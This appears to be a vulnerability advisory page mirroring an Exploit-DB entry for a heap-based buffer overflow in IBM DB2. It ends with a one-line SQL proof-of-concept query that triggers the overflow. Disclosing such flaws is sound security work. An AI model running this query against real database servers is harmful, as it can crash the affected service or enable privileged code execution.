header-logo
Suggest Exploit
vendor:
DB2
by:
7.5
CVSS
HIGH
Heap-based Buffer Overflow
CWE
Product Name: DB2
Affected Version From: IBM DB2 versions prior to 9.1 Fix Pack 9
Affected Version To: IBM DB2 9.7
Patch Exists: NO
Related CWE:
CPE: a:ibm:db2
Metasploit:
Other Scripts:
Platforms Tested:

Heap-based Buffer Overflow Vulnerability in IBM DB2

IBM DB2 is prone to a heap-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. Attackers can exploit this issue to execute arbitrary code with elevated privileges or crash the affected application.

Mitigation:

No mitigation or remediation information provided.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/37976/info

IBM DB2 is prone to a heap-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.

Attackers can exploit this issue to execute arbitrary code with elevated privileges or crash the affected application.

The issue affects the following:

IBM DB2 versions prior to 9.1 Fix Pack 9
IBM DB2 9.7

Other versions may also be affected. 

SELECT REPEAT(REPEAT('1',1000),1073741825) FROM SYSIBM.SYSDUMMY1

Navigation

Suggest Exploit

Services By CQR